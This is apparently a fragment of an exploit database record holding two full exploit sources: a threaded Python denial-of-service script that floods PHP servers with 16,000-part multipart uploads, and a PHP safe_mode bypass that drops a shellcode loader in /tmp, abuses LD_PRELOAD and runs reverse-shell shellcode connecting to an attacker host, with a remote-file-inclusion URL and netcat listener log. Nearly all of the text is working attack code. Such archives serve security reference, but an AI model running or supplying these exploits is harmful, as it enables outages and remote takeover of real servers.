So the more threads you spawn, the more impact you will make. 
In normal cases, spawning 150 childs would be enough. But the number depends on you.\r\n# Trial and error ;))\r\n#\r\n# Example:\r\n# python php-multipart-dos.py www.example.com 8080 /index.php\r\n#\r\n# By defalt, the program will create 100 threads, each thread will send 10 requests.\r\n# You can specify child number to create, you may want to increase or decrease for the impact, etc..\r\n#\r\n# python php-multipart-dos.py www.example.com 80 /~user/index.php 50\r\n#\r\n# Notes:\r\n# This script is for educational purposes only. Use it at your OWN risk!\r\n\r\nimport socket\r\nimport random\r\nimport time\r\nimport threading\r\nimport sys\r\n\r\nclass Connection:\r\n def __init__(self, host, port):\r\n self._host = host\r\n self._port = port\r\n self.sock = None\r\n\r\n def connect(self):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect((self._host, self._port))\r\n\r\n def send(self, msg):\r\n if not self.sock:\r\n raise \"NotConnected\"\r\n else:\r\n self.sock.send(msg)\r\n\r\n def close(self):\r\n self.sock.close()\r\n\r\nclass Exploit (threading.Thread):\r\n def __init__(self, host, port, target):\r\n self._host = host\r\n self._port = port\r\n self._target = target\r\n threading.Thread.__init__(self)\r\n\r\n def getBoundary(self):\r\n \"\"\" Return random boundary data \"\"\"\r\n random.seed()\r\n rnd = random.randrange(100000, 100000000)\r\n data = \"---------------------------%s\" % rnd\r\n return data\r\n\r\n def createPayload(self):\r\n data = \"\"\"POST %(target)s HTTP/1.1\\r\r\nHost: %(host)s\\r\r\nUset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\\r\r\nConnection: keep-alive\\r\r\nContent-Type: multipart/form-data; boundary=%(boundary)s\\r\r\nContent-Length: %(length)s\\r\\n\\r\\n\"\"\"\r\n\r\n boundary = self.getBoundary()\r\n\r\n # Create a number of upload data, 16.000, yeah! 
:)\r\n for i in range(16000):\r\n data += \"--%s\\r\\n\" % boundary\r\n data += \"\"\"Content-Disposition: form-data; name=\"file_%s\"; filename=\"file_%s.txt\"\\r\r\nContent-Type: text/plain\\r\\n\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\\n\\r\\n\"\"\" % (i, i)\r\n\r\n data += \"--%s--\\r\\n\" % boundary\r\n\r\n return data % {\"host\": self._host, \"target\": self._target, \"boundary\": boundary, \"length\": str(len(data))}\r\n\r\n def run(self):\r\n payload = self.createPayload()\r\n for i in range(0, 10):\r\n c = Connection(self._host, self._port)\r\n c.connect()\r\n c.send(payload)\r\n c.close()\r\n sys.exit(0)\r\n del payload\r\n sys.exit(0)\r\n\r\ndef usage():\r\n usage_data = \"\"\"\r\n __^__ __^__\r\n( ___ )------------------------------------------------( ___ )\r\n | / | | \\ |\r\n | / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \\ |\r\n | / | http://www.pardus.org.tr/eng/ | \\ |\r\n |___| |___|\r\n(_____)------------------------------------------------(_____)\r\n\r\nPHP denial of service exploit via temporary file exhaustion\r\nUsage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>\r\n\r\nSee source code for more information\r\n\"\"\"\r\n\r\n print usage_data\r\n\r\nif __name__ == '__main__':\r\n if not len(sys.argv) >= 4:\r\n usage()\r\n else:\r\n # is child number passed?\r\n if len(sys.argv) >= 5:\r\n child = int(sys.argv[4])\r\n else:\r\n child = 100\r\n print \"[+] Attack started...\"\r\n for i in range(0, child):\r\n try:\r\n exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))\r\n exp.start()\r\n print \"[+] Opening %s childs... [%s]\\r\" % (child, i+1),\r\n sys.stdout.flush()\r\n i += 1\r\n except KeyboardInterrupt:\r\n print \"\\n[-] Keyboard Interrupt. 
Exiting...\"\r\n sys.exit(1)\r\n\r\n # print it so that previous \"Opening childs...\" is still there\r\n print \"\"\r\n while True:\r\n try:\r\n activeChilds = threading.activeCount()\r\n print \"[+] Waiting for childs to finish. %d remaining...\\r\" % activeChilds,\r\n sys.stdout.flush()\r\n # we have one main process\r\n if activeChilds == 1:\r\n print \"\\nOK!\"\r\n sys.exit(0)\r\n except KeyboardInterrupt:\r\n print \"\\n[-] Exiting without waiting!\"\r\n sys.exit(1)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10242/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:24", "description": "\nKolang 4.3.10 5.3.0 - proc_open() PHP safe_mode Bypass", "edition": 1, "published": "2010-03-05T00:00:00", "title": "Kolang 4.3.10 5.3.0 - proc_open() PHP safe_mode Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2010-03-05T00:00:00", "id": "EXPLOITPACK:85B6EA95447B86407811EF78E0844A44", "href": "", "sourceData": "<?php\n/*\nKolang (PHP Safe mode bypass)\n(IHSteam priv8 for lazy penetration testers)\n\n(php 4.3.10 - 5.3.0)\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)\nhttp://www.milw0rm.com/exploits/7393 (12/09/2008)\n\n1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)\n2- Kolang can execute arbitrary shellcode (just for fans of metasploit )\n\n~~~~ How to use:)\n\nfor linux:\n\tkolang.php?os=linux&host=LHOST&port=LPORT\n\tor \n\tkolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE\n\nfor freebsd:\n\tkolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE\n\nfile inclusion :\n\thttp://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT\n\n\nhttp://localhost/kolang.php?host=localhost&port=2121\nhamid@bugtraq ~ $ nc -vv -l -p 2121\nlistening on [any] 2121 ...\nconnect to [127.0.0.1] from bugtraq [127.0.0.1] 
40526\nid\nuid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)\n\n\nHamid Ebadi\nhttp://www.bugtraq.ir\ncontact : ebadi~bugtraq~ir\n\nKolang means pickaxe (the idea came from amnafzar naming convention)\n(Separ, Sarand, Alak, Skort)\n*/\n\n\n$port= intval($_REQUEST['port']);\n$host= $_REQUEST['host'];\n$os= $_REQUEST['os'];\n\n/*\n\n\n//compile : cc -o shellcode.so -fPIC -shared shellcode.c\n//\n//<?php\n//$data=file_get_contents('shellcode.so');\n//file_put_contents('shellcode_base64.txt',$data);\n//?>\n\n\n\n\n// \"shellcode loader\" : load and execute arbitrary shellcode from a file\n// Hamid Ebadi\n#define O_RDONLY 00 ; fcntl.h\n#define SHELLCODE_MAX_SIZE 1024\n// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\n#define SHELLCODE_FILENAME \"/tmp/.X11-IHSTEAM\"\n\nvoid getuid()\n{\n\tunsetenv(\"LD_PRELOAD\"); //not really necessary, we can remove it\n\tint fd;\n\tchar shellcode[SHELLCODE_MAX_SIZE];\n\tchar filename[]=SHELLCODE_FILENAME ;\n\t// we can also pass the shellcode in program's arguments\n\tif ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {\n\texit(1);\n\t}\n\tif (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){\n\texit(1);\n\t}\n\t(*(void(*)()) shellcode)();\n}\n\n*/\n\nif ($_REQUEST['os']=='freebsd'){\n// freebsd shellcode loader 
(x86)\n$shellcode_loader=\n\"[base64 data omitted]\";\n}else{\n// default: linux\n// linux shellcode loader (x86)\n$shellcode_loader=\n\"[base64 data omitted]\" ;\n}\n\nif (!function_exists('file_put_contents')){\n function file_put_contents($filename, $data){\n $f = 
@fopen($filename, 'w');\n if (!$f){\n return false;\n }\n else{\n $bytes = fwrite($f, $data);\n fclose($f);\n return $bytes;\n }\n }\n}\n\n// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\nfile_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));\n$ip = gethostbyname($host);\n\n$port1 = sprintf('%c', ($port>> 8)&255 );\n$port2 = sprintf('%c', ($port>> 0)&255 );\n\n$part = explode('.', $ip);\n//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);\n$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);\n\n/*\n * linux/x86/shell_reverse_tcp - 71 bytes\n * http://www.metasploit.com\n * Encoder: generic/none\n * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,\n * PrependSetresuid=false, PrependSetreuid=false,\n * PrependSetuid=false, PrependChrootBreak=false,\n * AppendExit=false\n */\n\n\n$Xshellcode =\n\"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\".\n\"\\x5b\\x5e\\x68\".$STRINGIP.\"\\x66\\x68\".$port1.$port2.\"\\x66\\x53\\x6a\\x10\".\n\"\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\".\n\"\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\".\n\"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x00\" ;\n\nif(isset($_REQUEST['shellcode'])){\n// just for fans of metasploit\n$Xshellcode=base64_decode($_REQUEST['shellcode']);\n}\n\nfile_put_contents(\"/tmp/.X11-IHSTEAM\", $Xshellcode);\n\n$cwd = '/tmp/';\n$env = array('LD_PRELOAD' => '/tmp/shellcode.so');\nunset($var);\n\n$descriptorspec = array(0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"));\n\n// BOOM\nproc_open('IHSteam', $descriptorspec, $var, $cwd, $env);\nmail(\"IHSteam\",\"IHSteam\",\"IHSteam\",\"IHSteam\");\n?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}